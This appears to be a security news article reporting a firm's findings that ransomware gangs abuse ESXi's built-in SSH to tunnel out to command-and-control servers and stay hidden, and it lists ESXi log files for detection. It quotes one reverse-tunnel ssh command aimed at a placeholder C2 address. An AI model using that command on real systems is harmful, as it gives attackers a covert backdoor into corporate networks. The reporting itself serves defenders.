Ransomware gang uses SSH tunnels for stealthy VMware ESXi access

Ransomware actors targeting ESXi bare metal hypervisors are leveraging SSH tunneling to persist on the system while remaining undetected.

VMware ESXi appliances have a critical role in virtualized environments as they can run on a single physical server multiple virtual machines of an organization.

They are largely unmonitored and have been a target for hackers looking to access corporate networks where they can steal data and encrypt files, thus crippling an entire business by rendering all virtual machines inaccessible.

Cybersecurity company Sygnia reports that in many cases the compromise is achieved by exploiting known flaws or using compromised administrator credentials.

SSHing into the hypervisor

ESXi features a built-in SSH service that allows administrators to remotely manage the hypervisor via a shell.

Sygnia says that ransomware actors abuse this feature to establish persistence, move laterally, and deploy ransomware payloads. Since many organizations do not actively monitor ESXi SSH activity, attackers can use it stealthily.

“Once [the hackers are] on the device, setting up the tunneling is a simple task using the native SSH functionality or by deploying other common tooling with similar capabilities,” explains Sygnia.

“For example, by using the SSH binary, a remote port-forwarding to the C2 server can be easily setup by using the following command: ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>”

“Since ESXi appliances are resilient and rarely shutdown unexpectedly, this tunneling serves as a semi-persistent backdoor within the network.”

Gaps in logging

Sygnia also highlights challenges in monitoring ESXi logs, which lead to significant visibility gaps that ransomware actors know how to take advantage of.

Unlike most systems where logs are consolidated in a single syslog file, ESXi distributes logs across multiple dedicated log files, so finding evidence requires piecing together information from multiple sources.

The security firm suggests that system admins look into these four log files to detect SSH tunneling and ransomware activity:

• /var/log/shell.log → Tracks command execution in ESXi Shell
• /var/log/hostd.log → Logs administrative activities and user authentication
• /var/log/auth.log → Captures login attempts and authentication events
• /var/log/vobd.log → Stores system and security event logs

The hostd.log and vodb.log are likely to also contain traces of firewall rules modification, which is essential for allowing persistent SSH access.

It should be noted that ransomware actors often clear logs to erase evidence of SSH access, modify timestamps, or truncate logs to confuse investigators, so finding evidence isn’t always straightforward.

Ultimately, it is recommended that organizations centralize ESXi logs via syslog forwarding and integrate logs into a Security Information & Event Management (SIEM) system to detect anomalies.